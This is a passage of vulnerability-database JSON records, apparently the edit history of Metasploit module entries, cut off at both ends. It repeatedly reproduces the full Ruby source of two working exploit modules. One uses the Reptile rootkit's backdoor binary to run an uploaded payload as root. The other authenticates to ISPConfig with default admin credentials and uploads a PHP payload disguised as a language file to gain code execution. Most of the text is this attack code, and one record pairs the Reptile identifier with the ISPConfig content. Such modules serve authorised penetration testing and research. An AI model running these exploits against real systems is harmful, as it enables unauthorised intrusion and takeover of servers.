backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-26T10:26:24", "history": [], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:2277", "RHSA-2020:2285", "RHSA-2020:2289"]}, {"type": "kitploit", "idList": ["KITPLOIT:7441849037317797681", "KITPLOIT:8965433741129978892"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A3BA4EA665B9E917645E2224263E7D82"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:C2D58727E73DE4D18AFBC6321632C4FA"]}, {"type": "securelist", "idList": ["SECURELIST:375240F06A95008FE7F1C49E97EEC5AF"]}, {"type": "thn", "idList": ["THN:5259C2425B367BE03F52701840CF3838", "THN:754EDA3BD8060BD079B3DB44EE616405"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704692", "OPENVAS:1361412562310143963", "OPENVAS:1361412562310892219", "OPENVAS:1361412562310112757", "OPENVAS:1361412562310892218"]}, {"type": "exploitdb", "idList": ["EDB-ID:48509", "EDB-ID:48514", "EDB-ID:48511", "EDB-ID:48513"]}], "modified": "2020-05-26T10:26:24", "rev": 2}, "score": {"value": 0.9, "vector": "NONE", "modified": "2020-05-26T10:26:24", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-26T10:26:24", "differentElements": ["modified", "published"], "edition": 137}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-26T18:15:57", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22736"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2337"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892209", "OPENVAS:1361412562310892222", "OPENVAS:1361412562310704693", "OPENVAS:1361412562310144003"]}, {"type": "threatpost", "idList": ["THREATPOST:64DC6B60F693E46DD314DB70A547D319"]}, {"type": "redhat", "idList": ["RHSA-2020:2331", "RHSA-2020:2332"]}, {"type": "cve", "idList": ["CVE-2020-13361", "CVE-2020-11949"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4A2BF23A4BBCC93D88E3AA6C5E124734"]}, {"type": "ubuntu", "idList": ["USN-4367-2", "USN-4363-1", "USN-4369-2"]}, {"type": "vmware", "idList": ["VMSA-2020-0011"]}, {"type": "coresecurity", "idList": ["CORE-2020-0007"]}], "modified": "2020-05-26T18:15:57", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-05-26T18:15:57", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-26T18:15:57", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 138}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "e3d198573b89847a3e77064e7db7f9e6", "type": "metasploit", "bulletinFamily": "exploit", "title": "ISPConfig Authenticated Arbitrary PHP Code Execution", "description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script which is intended to be reuploaded later to restore language settings. This feature can be abused to run aribitrary PHP code remotely on the ISPConfig server. This module was tested against version 3.0.5.2.\n", "published": "2013-10-30T15:25:48", "modified": "2020-02-18T14:58:30", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3629", "https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"], "cvelist": ["CVE-2013-3629"], "lastseen": "2020-05-29T18:11:08", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3629"]}, {"type": "zdt", "idList": ["1337DAY-ID-21424"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123855"]}, {"type": "exploitdb", "idList": ["EDB-ID:29322"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ISPCONFIG_PHP_EXEC"]}], "modified": "2020-05-29T18:11:08", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2020-05-29T18:11:08", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/ispconfig_php_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ISPConfig Authenticated Arbitrary PHP Code Execution',\n 'Description' => %q{\n ISPConfig allows an authenticated administrator to export language settings into a PHP script\n which is intended to be reuploaded later to restore language settings. This feature\n can be abused to run aribitrary PHP code remotely on the ISPConfig server.\n\n This module was tested against version 3.0.5.2.\n },\n 'Author' =>\n [\n 'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-3629'],\n ['URL', 'https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats']\n ],\n 'Privileged' => false,\n 'Platform'\t => ['php'],\n 'Arch'\t\t\t => ARCH_PHP,\n 'Payload'\t\t=>\n {\n 'BadChars' => \"&\\n=+%\",\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 30 2013'))\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base ISPConfig directory path\", '/']),\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'admin']),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", 'admin']),\n OptString.new('LANGUAGE', [ true, \"The language to use to trigger the payload\", 'es'])\n ])\n end\n\n def lng\n datastore['LANGUAGE']\n end\n\n def exploit\n\n init = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/index.php')\n })\n\n if !init or init.code != 200\n fail_with(Failure::UnexpectedReply, \"Error getting initial page.\")\n end\n\n sess = init.get_cookies\n\n post = {\n 'username' => datastore[\"USERNAME\"],\n 'passwort' => datastore[\"PASSWORD\"],\n 's_mod' => 'login',\n 's_pg' => 'index'\n }\n\n print_status(\"Authenticating as user: \" << datastore[\"USERNAME\"])\n\n login = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/content.php'),\n 'vars_post' => post,\n 'cookie' => sess\n })\n\n if !login or login.code != 200\n fail_with(Failure::NoAccess, \"Error authenticating.\")\n end\n\n sess = login.get_cookies\n fname = rand_text_alphanumeric(rand(10)+6) + '.lng'\n php = \"---|ISPConfig Language File|3.0.5.2|#{lng}\\n\"\n php << \"--|global|#{lng}|#{lng}.lng\\n\"\n php << \"<?php \\n\"\n php << payload.encoded\n php << \"?>\\n\"\n php << \"--|mail|#{lng}|#{lng}.lng\\n\"\n php << \"<?php\"\n php << \"?>\"\n\n data = Rex::MIME::Message.new\n data.add_part(php, 'application/x-php', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{fname }\\\"\")\n data.add_part('1', nil, nil, 'form-data; name=\"overwrite\"')\n data.add_part('1', nil, nil, 'form-data; name=\"ignore_version\"')\n data.add_part('', nil, nil, 'form-data; name=\"id\"')\n\n data_post = data.to_s\n\n print_status(\"Sending payload\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/admin/language_import.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data_post,\n 'cookie' => sess\n })\n\n post = {\n 'lng_select' => 'es'\n }\n\n print_status(\"Triggering payload...\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/admin/language_complete.php'),\n 'vars_post' => post,\n 'cookie' => sess\n })\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-29T18:11:08", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 139}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-29T22:47:06", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0744-1"]}, {"type": "mozilla", "idList": ["MFSA2020-19"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8"]}, {"type": "kitploit", "idList": ["KITPLOIT:1927190131487103720"]}, {"type": "threatpost", "idList": ["THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "THREATPOST:E4BC26425F82A76EE3DA2C72A23E38A3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22736"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892209", "OPENVAS:1361412562310892222"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2337"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157869"]}, {"type": "redhat", "idList": ["RHSA-2020:2332", "RHSA-2020:2331"]}, {"type": "cve", "idList": ["CVE-2020-13361", "CVE-2020-11949"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4A2BF23A4BBCC93D88E3AA6C5E124734"]}], "modified": "2020-05-29T22:47:06", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-05-29T22:47:06", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-29T22:47:06", "differentElements": ["sourceData"], "edition": 140}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-30T02:22:21", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0744-1"]}, {"type": "mozilla", "idList": ["MFSA2020-19"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8"]}, {"type": "kitploit", "idList": ["KITPLOIT:1927190131487103720"]}, {"type": "threatpost", "idList": ["THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "THREATPOST:E4BC26425F82A76EE3DA2C72A23E38A3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22736"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892209", "OPENVAS:1361412562310892222"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2337"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157869"]}, {"type": "redhat", "idList": ["RHSA-2020:2332", "RHSA-2020:2331"]}, {"type": "cve", "idList": ["CVE-2020-13361", "CVE-2020-11949"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4A2BF23A4BBCC93D88E3AA6C5E124734"]}], "modified": "2020-05-30T02:22:21", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-05-30T02:22:21", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-30T02:22:21", "differentElements": ["sourceData"], "edition": 141}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-30T04:38:00", "history": [], "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:3476689772558392146", "KITPLOIT:1927190131487103720", "KITPLOIT:2253573000113160502"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-22828", "OSSFUZZ-22736", "OSSFUZZ-22799"]}, {"type": "thn", "idList": ["THN:F5F810043642581190E4BB21913894BF", "THN:D81EE0440DF268C88DAD844EBDA956EF"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2223-1:998E3"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0744-1"]}, {"type": "mozilla", "idList": ["MFSA2020-19"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8"]}, {"type": "threatpost", "idList": ["THREATPOST:E4BC26425F82A76EE3DA2C72A23E38A3", "THREATPOST:130EDA07603C228BE562B445904A297A"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2337"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892209"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157869"]}], "modified": "2020-05-30T04:38:00", "rev": 2}, "score": {"value": 1.7, "vector": "NONE", "modified": "2020-05-30T04:38:00", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n 